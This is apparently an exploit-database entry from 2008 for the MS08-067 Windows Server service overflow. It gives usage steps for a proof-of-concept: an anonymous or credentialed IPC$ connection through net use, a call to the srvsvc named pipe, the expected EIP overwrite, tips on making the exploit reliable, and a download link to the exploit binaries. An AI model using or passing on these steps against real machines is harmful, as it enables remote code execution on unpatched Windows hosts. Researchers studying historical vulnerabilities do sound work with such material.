26 lines
No EOL
760 B
Text
26 lines
No EOL
760 B
Text
In vstudio command prompt:
|
|
|
|
mk.bat
|
|
|
|
next:
|
|
|
|
attach debugger to services.exe (2k) or the relevant svchost (xp/2k3/...)
|
|
|
|
net use \\IPADDRESS\IPC$ /user:user creds
|
|
die \\IPADDRESS \pipe\srvsvc
|
|
|
|
In some cases, /user:"" "", will suffice (i.e., anonymous connection)
|
|
|
|
You should get EIP -> 00 78 00 78, a stack overflow (like a guard page
|
|
violation), access violation, etc. However, in some cases, you will get
|
|
nothing.
|
|
|
|
This is because it depends on the state of the stack prior to the "overflow".
|
|
You need a slash on the stack prior to the input buffer.
|
|
|
|
So play around a bit, you'll get it working reliably...
|
|
|
|
poc:
|
|
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6824.zip (2008-ms08-067.zip)
|
|
|
|
# milw0rm.com [2008-10-23] |